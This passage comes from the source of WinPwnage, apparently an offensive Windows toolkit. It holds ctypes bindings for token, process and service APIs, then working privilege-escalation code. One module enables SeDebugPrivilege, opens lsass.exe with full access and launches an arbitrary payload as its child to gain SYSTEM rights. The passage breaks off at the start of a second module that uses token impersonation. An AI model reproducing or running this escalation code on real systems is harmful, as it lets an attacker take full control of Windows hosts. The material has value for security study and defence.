= POINTER(DWORD) 19 | PULONG = POINTER(ULONG) 20 | PHANDLE = POINTER(HANDLE) 21 | PDWORD = POINTER(DWORD) 22 | 23 | # Misc constants 24 | SW_HIDE = 0 25 | SW_SHOW = 5 26 | MAX_PATH = 260 27 | SEE_MASK_NOCLOSEPROCESS = 0x00000040 28 | STATUS_UNSUCCESSFUL = ULONG(0xC0000001) 29 | 30 | # Process constants 31 | PROCESS_QUERY_INFORMATION = 0x0400 32 | PROCESS_QUERY_LIMITED_INFORMATION = 0x1000 33 | PROCESS_VM_READ = 0x0010 34 | PROCESS_ALL_ACCESS = (0x0080 | 0x0002 | 0x0040 | 0x0400 | 0x1000 | 0x0200 | 0x0100 | 0x0800 | 0x0001 | 0x0008 | 0x0010 | 0x0020 | 0x00100000) 35 | 36 | # Token constants 37 | TOKEN_DUPLICATE = 0x0002 38 | TOKEN_QUERY = 0x00000008 39 | TOKEN_ADJUST_PRIVILEGES = 0x00000020 40 | TOKEN_ASSIGN_PRIMARY = 0x0001 41 | TOKEN_ALL_ACCESS = (0x000F0000 | 0x0001 | 0x0002 | 0x0004 | 0x00000008 | 0x0010 | 0x00000020 | 0x0040 | 0x0080 | 0x0100) 42 | TOKEN_PRIVS = (0x00000008 | (0x00020000 | 0x00000008) | 0x0004 | 0x0010 | 0x0002 | 0x0001 | (131072 | 4)) 43 | TOKEN_WRITE = (0x00020000 | 0x0020 | 0x0040 | 0x0080) 44 | 45 | class c_enum(enum.IntEnum): 46 | @classmethod 47 | def from_param(cls, obj): 48 | return c_int(cls(obj)) 49 | 50 | class TOKEN_INFORMATION_CLASS(c_enum): 51 | """ https://docs.microsoft.com/en-us/windows/win32/api/winnt/ne-winnt-token_information_class """ 52 | TokenUser = 1 53 | TokenElevation = 20 54 | TokenIntegrityLevel = 25 55 | 56 | class TOKEN_TYPE(c_enum): 57 | """ https://docs.microsoft.com/en-us/windows/win32/api/winnt/ne-winnt-token_type """ 58 | TokenPrimary = 1 59 | TokenImpersonation = 2 60 | 61 | class SECURITY_IMPERSONATION_LEVEL(INT): 62 | """ https://docs.microsoft.com/en-us/windows/win32/api/winnt/ne-winnt-security_impersonation_level """ 63 | SecurityAnonymous = 0 64 | SecurityIdentification = SecurityAnonymous + 1 65 | SecurityImpersonation = SecurityIdentification + 1 66 | SecurityDelegation = SecurityImpersonation + 1 67 | 68 | class IntegrityLevel(object): 69 | """ https://docs.microsoft.com/en-us/windows/win32/secauthz/well-known-sids """ 70 | SECURITY_MANDATORY_UNTRUSTED_RID = 0x00000000 71 | SECURITY_MANDATORY_LOW_RID = 0x00001000 72 | SECURITY_MANDATORY_MEDIUM_RID = 0x00002000 73 | SECURITY_MANDATORY_MEDIUM_PLUS_RID = SECURITY_MANDATORY_MEDIUM_RID + 0x100 74 | SECURITY_MANDATORY_HIGH_RID = 0X00003000 75 | SECURITY_MANDATORY_SYSTEM_RID = 0x00004000 76 | SECURITY_MANDATORY_PROTECTED_PROCESS_RID = 0x00005000 77 | 78 | class GroupAttributes(object): 79 | """ https://msdn.microsoft.com/en-us/windows/desktop/aa379624""" 80 | SE_GROUP_ENABLED = 0x00000004 81 | SE_GROUP_ENABLED_BY_DEFAULT = 0x00000002 82 | SE_GROUP_INTEGRITY = 0x00000020 83 | SE_GROUP_INTEGRITY_ENABLED = 0x00000040 84 | SE_GROUP_LOGON_ID = 0xC0000000 85 | SE_GROUP_MANDATORY = 0x00000001 86 | SE_GROUP_OWNER = 0x00000008 87 | SE_GROUP_RESOURCE = 0x20000000 88 | SE_GROUP_USE_FOR_DENY_ONLY = 0x00000010 89 | 90 | class LUID(Structure): 91 | """ https://msdn.microsoft.com/en-us/windows/desktop/dd316552 """ 92 | _fields_ = [ 93 | ("LowPart", DWORD), 94 | ("HighPart", LONG) 95 | ] 96 | 97 | class LUID_AND_ATTRIBUTES(Structure): 98 | """ https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/ns-wdm-_luid_and_attributes """ 99 | _fields_ = [ 100 | ("Luid", LUID), 101 | ("Attributes", DWORD) 102 | ] 103 | 104 | class TOKEN_PRIVILEGES(Structure): 105 | """ 106 | https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-token_privileges 107 | Used by elevate_handle_inheritance module 108 | """ 109 | _fields_ = [ 110 | ("PrivilegeCount", DWORD), 111 | ("Privileges", LUID_AND_ATTRIBUTES * 512) 112 | ] 113 | 114 | class TOKEN_PRIVILEGES2(Structure): 115 | """ 116 | https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-token_privileges 117 | Used by elevate_token_impersonation module 118 | """ 119 | _fields_ = [ 120 | ("PrivilegeCount", DWORD), 121 | ("Privileges", DWORD * 3) 122 | ] 123 | 124 | class PROC_THREAD_ATTRIBUTE_ENTRY(Structure): 125 | """ https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-updateprocthreadattribute """ 126 | _fields_ = [ 127 | ("Attribute", DWORD), 128 | ("cbSize", SIZE_T), 129 | ("lpValue", PVOID) 130 | ] 131 | 132 | class PROC_THREAD_ATTRIBUTE_LIST(Structure): 133 | """ https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-updateprocthreadattribute """ 134 | _fields_ = [ 135 | ("dwFlags", DWORD), 136 | ("Size", ULONG), 137 | ("Count", ULONG), 138 | ("Reserved", ULONG), 139 | ("Unknown", PULONG), 140 | ("Entries", PROC_THREAD_ATTRIBUTE_ENTRY * 1) 141 | ] 142 | 143 | class STARTUPINFO(Structure): 144 | """ https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/ns-processthreadsapi-startupinfoa """ 145 | _fields_ = [ 146 | ("cb", DWORD), 147 | ("lpReserved", LPTSTR), 148 | ("lpDesktop", LPTSTR), 149 | ("lpTitle", LPTSTR), 150 | ("dwX", DWORD), 151 | ("dwY", DWORD), 152 | ("dwXSize", DWORD), 153 | ("dwYSize", DWORD), 154 | ("dwXCountChars", DWORD), 155 | ("dwYCountChars", DWORD), 156 | ("dwFillAttribute", DWORD), 157 | ("dwFlags", DWORD), 158 | ("wShowWindow", WORD), 159 | ("cbReserved2", WORD), 160 | ("lpReserved2", LPBYTE), 161 | ("hStdInput", HANDLE), 162 | ("hStdOutput", HANDLE), 163 | ("hStdError", HANDLE) 164 | ] 165 | 166 | class STARTUPINFOEX(Structure): 167 | """ https://msdn.microsoft.com/en-us/windows/desktop/ms686329 """ 168 | _fields_ = [ 169 | ("StartupInfo", STARTUPINFO), 170 | ("lpAttributeList", LPVOID) 171 | ] 172 | 173 | class PROCESS_INFORMATION(Structure): 174 | """ https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/ns-processthreadsapi-process_information """ 175 | _fields_ = [ 176 | ("hProcess", HANDLE), 177 | ("hThread", HANDLE), 178 | ("dwProcessId", DWORD), 179 | ("dwThreadId", DWORD) 180 | ] 181 | 182 | class SID_AND_ATTRIBUTES(Structure): 183 | """ https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntifs/ns-ntifs-_sid_and_attributes """ 184 | _fields_ = [ 185 | ("Sid", LPVOID), 186 | ("Attributes", DWORD) 187 | ] 188 | 189 | class TOKEN_USER(Structure): 190 | """ https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-token_user """ 191 | _fields_ = [ 192 | ("User", SID_AND_ATTRIBUTES) 193 | ] 194 | 195 | class TOKEN_MANDATORY_LABEL(Structure): 196 | """ https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-token_mandatory_label """ 197 | _fields_ = [ 198 | ("Label", SID_AND_ATTRIBUTES) 199 | ] 200 | 201 | class SECURITY_ATTRIBUTES(Structure): 202 | """ https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa379560(v=vs.85) """ 203 | _fields_ = [ 204 | ("nLength", DWORD), 205 | ("lpSecurityDescriptor", LPVOID), 206 | ("bInheritHandle", BOOL) 207 | ] 208 | 209 | class SID_IDENTIFIER_AUTHORITY(Structure): 210 | """ https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-sid_identifier_authority """ 211 | _fields_ = [ 212 | ("Value", 213 | BYTE * 6) 214 | ] 215 | 216 | class ShellExecuteInfoW(Structure): 217 | """ https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-shellexecuteinfow """ 218 | _fields_ = [ 219 | ("cbSize", DWORD), 220 | ("fMask", ULONG), 221 | ("hwnd", HWND), 222 | ("lpVerb", LPWSTR), 223 | ("lpFile", LPWSTR), 224 | ("lpParameters", LPWSTR), 225 | ("lpDirectory", LPWSTR), 226 | ("nShow", INT), 227 | ("hInstApp", HINSTANCE), 228 | ("lpIDList", LPVOID), 229 | ("lpClass", LPWSTR), 230 | ("hKeyClass", HKEY), 231 | ("dwHotKey", DWORD), 232 | ("hIcon", HANDLE), 233 | ("hProcess", HANDLE) 234 | ] 235 | 236 | #https://docs.microsoft.com/en-us/windows/desktop/api/shellapi/nf-shellapi-shellexecuteexw 237 | ShellExecuteEx = ctypes.windll.shell32.ShellExecuteExW 238 | ShellExecuteEx.argtypes = [POINTER(ShellExecuteInfoW)] 239 | ShellExecuteEx.restype = BOOL 240 | 241 | #https://docs.microsoft.com/en-us/windows/desktop/api/processthreadsapi/nf-processthreadsapi-openprocess 242 | OpenProcess = ctypes.windll.kernel32.OpenProcess 243 | OpenProcess.restype = HANDLE 244 | OpenProcess.argtypes = [DWORD, BOOL, DWORD] 245 | 246 | #https://docs.microsoft.com/en-us/windows/desktop/api/handleapi/nf-handleapi-closehandle 247 | CloseHandle = ctypes.windll.kernel32.CloseHandle 248 | CloseHandle.argtypes = [LPVOID] 249 | CloseHandle.restype = INT 250 | 251 | #https://docs.microsoft.com/en-us/windows/desktop/api/winbase/nf-winbase-queryfullprocessimagenamew 252 | QueryFullProcessImageNameW = ctypes.windll.kernel32.QueryFullProcessImageNameW 253 | QueryFullProcessImageNameW.argtypes = [HANDLE, DWORD, LPWSTR, POINTER(DWORD)] 254 | QueryFullProcessImageNameW.restype = BOOL 255 | 256 | #https://msdn.microsoft.com/en-us/library/windows/desktop/ms679360(v=vs.85).aspx 257 | GetLastError = ctypes.windll.kernel32.GetLastError 258 | GetLastError.restype = DWORD 259 | 260 | #https://docs.microsoft.com/en-us/windows/desktop/api/processthreadsapi/nf-processthreadsapi-terminateprocess 261 | TerminateProcess = ctypes.windll.kernel32.TerminateProcess 262 | TerminateProcess.restype = BOOL 263 | TerminateProcess.argtypes = [HANDLE, UINT] 264 | 265 | #https://docs.microsoft.com/en-us/windows/desktop/api/synchapi/nf-synchapi-waitforsingleobject 266 | WaitForSingleObject = ctypes.windll.kernel32.WaitForSingleObject 267 | WaitForSingleObject.restype = DWORD 268 | WaitForSingleObject.argtypes = [HANDLE, DWORD] 269 | 270 | #https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FToken%2FNtOpenProcessToken.html 271 | NtOpenProcessToken = ctypes.windll.ntdll.NtOpenProcessToken 272 | NtOpenProcessToken.restype = BOOL 273 | NtOpenProcessToken.argtypes = [HANDLE, DWORD, PHANDLE] 274 | 275 | #https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntifs/nf-ntifs-ntsetinformationtoken 276 | NtSetInformationToken = ctypes.windll.ntdll.NtSetInformationToken 277 | NtSetInformationToken.restype = NTSTATUS 278 | NtSetInformationToken.argtypes = [HANDLE, TOKEN_INFORMATION_CLASS, LPVOID, ULONG] 279 | 280 | #https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntifs/nf-ntifs-rtlallocateandinitializesid 281 | RtlAllocateAndInitializeSid = ctypes.windll.ntdll.RtlAllocateAndInitializeSid 282 | RtlAllocateAndInitializeSid.restype = BOOL 283 | RtlAllocateAndInitializeSid.argtypes = [POINTER(SID_IDENTIFIER_AUTHORITY), BYTE, DWORD, DWORD, DWORD, DWORD, DWORD, DWORD, DWORD, DWORD, LPVOID] 284 | 285 | #http://www.codewarrior.cn/ntdoc/wrk/se/NtFilterToken.htm 286 | NtFilterToken = ctypes.windll.ntdll.NtFilterToken 287 | NtFilterToken.restype = NTSTATUS 288 | NtFilterToken.argtypes = [HANDLE, ULONG, LPVOID, LPVOID, LPVOID, PHANDLE] 289 | 290 | #https://docs.microsoft.com/en-us/windows/desktop/api/winbase/nf-winbase-createprocesswithlogonw 291 | CreateProcessWithLogonW = ctypes.windll.advapi32.CreateProcessWithLogonW 292 | CreateProcessWithLogonW.restype = BOOL 293 | CreateProcessWithLogonW.argtypes = [LPCWSTR, LPCWSTR, LPCWSTR, DWORD, LPCWSTR, LPWSTR, DWORD, LPVOID, LPCWSTR, POINTER(STARTUPINFO), POINTER(PROCESS_INFORMATION)] 294 | 295 | #https://docs.microsoft.com/en-us/windows/desktop/api/processthreadsapi/nf-processthreadsapi-getcurrentprocess 296 | GetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess 297 | GetCurrentProcess.restype = HANDLE 298 | 299 | #https://docs.microsoft.com/en-us/windows/desktop/api/processthreadsapi/nf-processthreadsapi-openprocesstoken 300 | OpenProcessToken = ctypes.windll.advapi32.OpenProcessToken 301 | OpenProcessToken.restype = BOOL 302 | OpenProcessToken.argtypes = [HANDLE, DWORD, POINTER(HANDLE)] 303 | 304 | #https://docs.microsoft.com/en-us/windows/desktop/api/processthreadsapi/nf-processthreadsapi-getcurrentprocessid 305 | GetCurrentProcessId = ctypes.windll.kernel32.GetCurrentProcessId 306 | GetCurrentProcessId.restype = DWORD 307 | 308 | #https://docs.microsoft.com/en-us/windows/desktop/api/processthreadsapi/nf-processthreadsapi-getcurrentthread 309 | GetCurrentThread = ctypes.windll.kernel32.GetCurrentThread 310 | GetCurrentThread.restype = HANDLE 311 | 312 | #https://docs.microsoft.com/en-us/windows/desktop/api/winbase/nf-winbase-lookupprivilegevaluew 313 | LookupPrivilegeValue = ctypes.windll.advapi32.LookupPrivilegeValueW 314 | LookupPrivilegeValue.restype = BOOL 315 | LookupPrivilegeValue.argtypes = [LPWSTR, LPWSTR, POINTER(LUID)] 316 | 317 | #https://docs.microsoft.com/en-us/windows/desktop/api/securitybaseapi/nf-securitybaseapi-adjusttokenprivileges 318 | AdjustTokenPrivileges = ctypes.windll.advapi32.AdjustTokenPrivileges 319 | AdjustTokenPrivileges.restype = BOOL 320 | AdjustTokenPrivileges.argtypes = [HANDLE, BOOL, LPVOID, DWORD, LPVOID, POINTER(DWORD)] 321 | 322 | #https://docs.microsoft.com/en-us/windows/desktop/api/psapi/nf-psapi-enumprocesses 323 | EnumProcesses = ctypes.windll.psapi.EnumProcesses 324 | EnumProcesses.restype = BOOL 325 | EnumProcesses.argtypes = [LPVOID, DWORD, LPDWORD] 326 | 327 | #https://docs.microsoft.com/en-us/windows/desktop/api/psapi/nf-psapi-getprocessimagefilenamea 328 | GetProcessImageFileName = ctypes.windll.psapi.GetProcessImageFileNameA 329 | GetProcessImageFileName.restype = DWORD 330 | GetProcessImageFileName.argtypes = [HANDLE, LPBYTE, DWORD] 331 | 332 | #https://docs.microsoft.com/en-us/windows/desktop/api/processthreadsapi/nf-processthreadsapi-initializeprocthreadattributelist 333 | InitializeProcThreadAttributeList = ctypes.windll.kernel32.InitializeProcThreadAttributeList 334 | InitializeProcThreadAttributeList.restype = BOOL 335 | InitializeProcThreadAttributeList.argtypes = [POINTER(PROC_THREAD_ATTRIBUTE_LIST), DWORD, DWORD, POINTER(SIZE_T)] 336 | 337 | #https://docs.microsoft.com/en-us/windows/desktop/api/processthreadsapi/nf-processthreadsapi-updateprocthreadattribute 338 | UpdateProcThreadAttribute = ctypes.windll.kernel32.UpdateProcThreadAttribute 339 | UpdateProcThreadAttribute.restype = BOOL 340 | UpdateProcThreadAttribute.argtypes = [POINTER(PROC_THREAD_ATTRIBUTE_LIST), DWORD, DWORD, PVOID, SIZE_T, PVOID, POINTER(SIZE_T)] 341 | 342 | #https://docs.microsoft.com/en-us/windows/desktop/api/processthreadsapi/nf-processthreadsapi-createprocessw 343 | CreateProcess = ctypes.windll.kernel32.CreateProcessW 344 | CreateProcess.restype = BOOL 345 | CreateProcess.argtypes = [LPCWSTR, LPWSTR, LPVOID, LPVOID, BOOL, DWORD, LPVOID, LPCWSTR, POINTER(STARTUPINFOEX), POINTER(PROCESS_INFORMATION)] 346 | 347 | #https://docs.microsoft.com/en-us/windows/desktop/api/processthreadsapi/nf-processthreadsapi-deleteprocthreadattributelist 348 | DeleteProcThreadAttributeList = ctypes.windll.kernel32.DeleteProcThreadAttributeList 349 | DeleteProcThreadAttributeList.restype = None 350 | DeleteProcThreadAttributeList.argtypes = [POINTER(PROC_THREAD_ATTRIBUTE_LIST)] 351 | 352 | #https://docs.microsoft.com/en-us/windows/desktop/api/securitybaseapi/nf-securitybaseapi-gettokeninformation 353 | GetTokenInformation = ctypes.windll.advapi32.GetTokenInformation 354 | GetTokenInformation.restype = BOOL 355 | GetTokenInformation.argtypes = [HANDLE, INT, LPVOID, DWORD, PDWORD] 356 | 357 | #https://docs.microsoft.com/en-us/windows/desktop/api/sddl/nf-sddl-convertsidtostringsida 358 | ConvertSidToStringSidA = ctypes.windll.advapi32.ConvertSidToStringSidA 359 | ConvertSidToStringSidA.restype = BOOL 360 | ConvertSidToStringSidA.argtypes = [LPVOID, LPVOID] 361 | 362 | #https://docs.microsoft.com/en-us/windows/desktop/api/securitybaseapi/nf-securitybaseapi-duplicatetokenex 363 | DuplicateTokenEx = ctypes.windll.advapi32.DuplicateTokenEx 364 | DuplicateTokenEx.restype = BOOL 365 | DuplicateTokenEx.argtypes = [HANDLE, DWORD, LPVOID, SECURITY_IMPERSONATION_LEVEL, TOKEN_TYPE, PHANDLE] 366 | 367 | #https://docs.microsoft.com/en-us/windows/desktop/api/securitybaseapi/nf-securitybaseapi-impersonateloggedonuser 368 | ImpersonateLoggedOnUser = ctypes.windll.advapi32.ImpersonateLoggedOnUser 369 | ImpersonateLoggedOnUser.restype = BOOL 370 | ImpersonateLoggedOnUser.argtypes = [HANDLE] 371 | 372 | #https://docs.microsoft.com/en-us/windows/desktop/api/winbase/nf-winbase-createprocesswithtokenw 373 | CreateProcessWithToken = ctypes.windll.advapi32.CreateProcessWithTokenW 374 | CreateProcessWithToken.restype = BOOL 375 | CreateProcessWithToken.argtypes = [HANDLE, DWORD, LPCWSTR, LPWSTR, DWORD, LPCWSTR, LPCWSTR, POINTER(STARTUPINFO), POINTER(PROCESS_INFORMATION)] 376 | 377 | #https://docs.microsoft.com/en-us/windows/desktop/api/winsvc/nf-winsvc-openscmanagera 378 | OpenSCManager = ctypes.windll.advapi32.OpenSCManagerA 379 | OpenSCManager.restype = SC_HANDLE 380 | OpenSCManager.argtypes = [LPCSTR, LPCSTR, DWORD] 381 | 382 | #https://docs.microsoft.com/en-us/windows/desktop/api/winsvc/nf-winsvc-createservicea 383 | CreateService = ctypes.windll.advapi32.CreateServiceA 384 | CreateService.restype = SC_HANDLE 385 | CreateService.argtypes = [SC_HANDLE, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD, DWORD, LPCTSTR, LPCTSTR, LPDWORD, LPCTSTR, LPCTSTR, LPCTSTR] 386 | 387 | #https://docs.microsoft.com/en-us/windows/desktop/api/winsvc/nf-winsvc-openservicea 388 | OpenService = ctypes.windll.advapi32.OpenServiceA 389 | OpenService.restype = SC_HANDLE 390 | OpenService.argtypes = [SC_HANDLE, LPCTSTR, DWORD] 391 | 392 | #https://docs.microsoft.com/en-us/windows/desktop/api/winsvc/nf-winsvc-startservicea 393 | StartService = ctypes.windll.advapi32.StartServiceA 394 | StartService.restype = BOOL 395 | StartService.argtypes = [SC_HANDLE, DWORD, LPCTSTR] 396 | 397 | #https://docs.microsoft.com/en-us/windows/desktop/api/winsvc/nf-winsvc-deleteservice 398 | DeleteService = ctypes.windll.advapi32.DeleteService 399 | DeleteService.restype = BOOL 400 | DeleteService.argtypes = [SC_HANDLE] 401 | 402 | #https://docs.microsoft.com/en-us/windows/desktop/api/winsvc/nf-winsvc-closeservicehandle 403 | CloseServiceHandle = ctypes.windll.advapi32.CloseServiceHandle 404 | CloseServiceHandle.restype = SC_HANDLE 405 | CloseServiceHandle.argtypes = [SC_HANDLE] 406 | 407 | #https://docs.microsoft.com/en-us/windows/desktop/api/processthreadsapi/nf-processthreadsapi-createthread 408 | CreateThread = ctypes.windll.kernel32.CreateThread 409 | CreateThread.restype = HANDLE 410 | CreateThread.argtypes = [LPVOID, SIZE_T, LPVOID, LPVOID, DWORD, LPDWORD] 411 | 412 | #https://docs.microsoft.com/en-us/windows/desktop/api/winbase/nf-winbase-createnamedpipea 413 | CreateNamedPipe = ctypes.windll.kernel32.CreateNamedPipeA 414 | CreateNamedPipe.restype = HANDLE 415 | CreateNamedPipe.argtypes = [LPCSTR, DWORD, DWORD, DWORD, DWORD, DWORD, DWORD, LPVOID] 416 | 417 | #https://msdn.microsoft.com/en-us/library/windows/desktop/aa365146(v=vs.85).aspx 418 | ConnectNamedPipe = ctypes.windll.kernel32.ConnectNamedPipe 419 | ConnectNamedPipe.restype = BOOL 420 | ConnectNamedPipe.argtypes = [HANDLE, LPVOID] 421 | 422 | #https://docs.microsoft.com/en-us/windows/desktop/api/fileapi/nf-fileapi-readfile 423 | ReadFile = ctypes.windll.kernel32.ReadFile 424 | ReadFile.restype = BOOL 425 | ReadFile.argtypes = [HANDLE, LPVOID, DWORD, LPDWORD, LPVOID] 426 | 427 | #https://msdn.microsoft.com/en-us/library/windows/desktop/aa378618(v=vs.85).aspx 428 | ImpersonateNamedPipeClient = ctypes.windll.advapi32.ImpersonateNamedPipeClient 429 | ImpersonateNamedPipeClient.restype = BOOL 430 | ImpersonateNamedPipeClient.argtypes = [HANDLE] 431 | 432 | #https://docs.microsoft.com/en-us/windows/desktop/api/processthreadsapi/nf-processthreadsapi-openthreadtoken 433 | OpenThreadToken = ctypes.windll.advapi32.OpenThreadToken 434 | OpenThreadToken.restype = BOOL 435 | OpenThreadToken.argtypes = [HANDLE, DWORD, BOOL, PHANDLE] 436 | 437 | #https://docs.microsoft.com/en-us/windows/desktop/api/processthreadsapi/nf-processthreadsapi-createprocessasusera 438 | CreateProcessAsUser = ctypes.windll.advapi32.CreateProcessAsUserA 439 | CreateProcessAsUser.restype = BOOL 440 | CreateProcessAsUser.argtypes = [HANDLE, LPCTSTR, LPTSTR, LPVOID, LPVOID, BOOL, DWORD, LPVOID, LPCTSTR, POINTER(STARTUPINFO), POINTER(PROCESS_INFORMATION)] 441 | 442 | def get_process_name(hProcess, dwFlags = 0): 443 | ERROR_INSUFFICIENT_BUFFER = 122 444 | dwSize = MAX_PATH 445 | while 1: 446 | lpdwSize = DWORD(dwSize) 447 | lpExeName = create_unicode_buffer('', lpdwSize.value + 1) 448 | success = QueryFullProcessImageNameW(hProcess, dwFlags, lpExeName, byref(lpdwSize)) 449 | if success and 0 < lpdwSize.value < dwSize: 450 | break 451 | error = GetLastError() 452 | if error != ERROR_INSUFFICIENT_BUFFER: 453 | return False 454 | dwSize = dwSize + 256 455 | if dwSize > 0x1000: 456 | # this prevents an infinite loop in Windows 2008 when the path has spaces, 457 | # see http://msdn.microsoft.com/en-us/library/ms684919(VS.85).aspx#4 458 | return False 459 | return lpExeName.value 460 | -------------------------------------------------------------------------------- /winpwnage/functions/__init__.py: -------------------------------------------------------------------------------- 1 | #init -------------------------------------------------------------------------------- /winpwnage/functions/elevate/__init__.py: -------------------------------------------------------------------------------- 1 | #init -------------------------------------------------------------------------------- /winpwnage/functions/elevate/elevateMethod1.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | from winpwnage.core.winstructures import * 4 | import os 5 | 6 | #Creds to: https://gist.github.com/highsenburger69/acc7b1b4589e51905a93db46ac5f81b2 7 | 8 | elevateMethod1_info = { 9 | "Description": "Elevate from administrator to NT AUTHORITY SYSTEM using handle inheritance", 10 | "Method": "Handle inheritance", 11 | "Id": "1", 12 | "Type": "Elevation", 13 | "Fixed In": "99999" if information().admin() == True else "0", 14 | "Works From": "7600", 15 | "Admin": True, 16 | "Function Name": "elevateMethod1", 17 | "Function Payload": True, 18 | } 19 | 20 | def elevateMethod1(payload): 21 | if not information().admin(): 22 | print_error("Cannot proceed, we are not elevated") 23 | return False 24 | 25 | if payloads().exe(payload): 26 | hToken = HANDLE(c_void_p(-1).value) 27 | print_info("Grabbing and modifying current process token") 28 | if OpenProcessToken(GetCurrentProcess(), (0x00000020 | 0x00000008), byref(hToken)) == 0: 29 | print_error("Couldn't get process token. Error in OpenProcessToken: {}".format(GetLastError())) 30 | return False 31 | 32 | print_info("Locate LUID for specified privilege") 33 | luid = LUID() 34 | if LookupPrivilegeValue(None, "SeDebugPrivilege", byref(luid)) == 0: 35 | print_error("Couldn't lookup privilege value. Error in LookupPrivilegeValue: {}".format(GetLastError())) 36 | return False 37 | 38 | print_info("Modifying token structure to enable SeDebugPrivilege") 39 | tp = TOKEN_PRIVILEGES() 40 | tp.PrivilegeCount = 1 41 | tp.Privileges[0].Luid = luid 42 | tp.Privileges[0].Attributes = 0x00000002 43 | 44 | if AdjustTokenPrivileges(hToken, False, byref(tp), sizeof(tp), None, None) == 0: 45 | print_error("Couldn't enabled or disable the privilege. Error in AdjustTokenPrivileges: {}".format(GetLastError())) 46 | return False 47 | else: 48 | print_success("Adjusted SeDebugPrivilege privileges for the current process PID: {}".format(GetCurrentProcessId())) 49 | CloseHandle(hToken) 50 | 51 | while True: 52 | DWORD_array = (DWORD * 0xFFFF) 53 | ProcessIds = DWORD_array() 54 | ProcessIdsSize = sizeof(ProcessIds) 55 | BytesReturned = DWORD() 56 | if EnumProcesses(ProcessIds, ProcessIdsSize, BytesReturned): 57 | if BytesReturned.value < ProcessIdsSize: 58 | break 59 | 60 | RunningProcesses = int(BytesReturned.value / sizeof(DWORD)) 61 | for process in range(RunningProcesses): 62 | ProcessId = ProcessIds[process] 63 | hProcess = OpenProcess(0x1000, False, ProcessId) 64 | if hProcess: 65 | ImageFileName = (c_char * MAX_PATH)() 66 | if GetProcessImageFileName(hProcess, ImageFileName, MAX_PATH) > 0: 67 | filename = os.path.basename(ImageFileName.value) 68 | systemprocess = b"lsass.exe" 69 | if filename == systemprocess: 70 | pid = ProcessId 71 | print_info("Found {} to act as PROC_THREAD_ATTRIBUTE_PARENT_PROCESS".format(systemprocess)) 72 | print_info("PID of our to be parent process: {}".format(ProcessId)) 73 | break 74 | 75 | CloseHandle(hProcess) 76 | 77 | handle = OpenProcess(PROCESS_ALL_ACCESS, False, int(ProcessId)) 78 | if handle == 0: 79 | print_error("Error in OpenProcess: {}".format(GetLastError())) 80 | 81 | print_info("Acquired handle to {} process".format(systemprocess)) 82 | Size = SIZE_T(0) 83 | InitializeProcThreadAttributeList(None, 1, 0, byref(Size)) 84 | if Size.value == 0: 85 | print_error("Error in NULL InitializeProcThreadAttributeList: {}".format(GetLastError())) 86 | 87 | print_info("Building empty attribute list") 88 | dwSize = len((BYTE * Size.value)()) 89 | AttributeList = PROC_THREAD_ATTRIBUTE_LIST() 90 | if InitializeProcThreadAttributeList(AttributeList, 1, 0, byref(Size)) == 0: 91 | print_error("Error in InitializeProcThreadAttributeList: {}".format(GetLastError())) 92 | 93 | print_info("Size of memory block used to store attributes: {}".format(dwSize)) 94 | print_info("Allocating and initializing a AttributeList") 95 | lpvalue = PVOID(handle) 96 | if UpdateProcThreadAttribute(AttributeList, 0, (0 | 0x00020000), byref(lpvalue), sizeof(lpvalue), None, None) == 0: 97 | print_error("Error in UpdateProcThreadAttribute: {}".format(GetLastError())) 98 | 99 | print_info("Inheriting the handle of the privileged process for CreateProcess") 100 | lpStartupInfo = STARTUPINFOEX() 101 | lpStartupInfo.StartupInfo.cb = sizeof(lpStartupInfo) 102 | lpStartupInfo.lpAttributeList = addressof(AttributeList) 103 | lpProcessInformation = PROCESS_INFORMATION() 104 | if CreateProcess(None, payloads().exe(payload)[1], None, None, 0, (0x00000010 | 0x00080000),None, None, byref(lpStartupInfo), byref(lpProcessInformation)) == 0: 105 | print_error("Error in specifying privileged parent process in CreateProc: {}".format(GetLastError())) 106 | else: 107 | print_success("Successfully elevated process PID: {}".format(lpProcessInformation.dwProcessId)) 108 | 109 | CloseHandle(handle) 110 | DeleteProcThreadAttributeList(AttributeList) 111 | else: 112 | print_error("Cannot proceed, invalid payload") 113 | return False 114 | -------------------------------------------------------------------------------- /winpwnage/functions/elevate/elevateMethod2.py: -------------------------------------------------------------------------------- 1 | from winpwnage.core.prints import * 2 | from winpwnage.core.utils import * 3 | from winpwnage.core.winstructures import * 4 | 5 | #Creds to: https://gist.github.com/highsenburger69/147a16dd003b2fd1eacd9afcd1d0fe7f 6 | 7 | elevateMethod2_info = { 8 | "Description": "Elevate from administrator to NT AUTHORITY SYSTEM using token impersonation", 9 | "Method": "Token impersonation", 10 | "Id": "2", 11 | "Type": "Elevation", 12 | "Fixed In": "99999" if information().admin() == True else "0", 13 | "Works From": "7600", 14 | "Admin": True, 15 | "Function Name": "elevateMethod2", 16 | "Function Payload": True, 17 | } 18 | 19 | def elevateMethod2(payload): 20 | if not information().admin(): 21 | print_error("Cannot proceed, we are not elevated") 22 | return False 23 | 24 | if payloads().exe(payload): 25 | params = payloads().exe(payload)[1].replace(payloads().exe(payload)[1].split(' ', 1)[0], '').lstrip() 26 | payload = payloads().exe(payload)[1].split(' ', 1)[0] 27 | 28 | print_info("Enabling SeDebugPrivilege") 29 | hToken = HANDLE(c_void_p(-1).value) 30 | if OpenProcessToken(GetCurrentProcess(),(TOKEN_ALL_ACCESS | 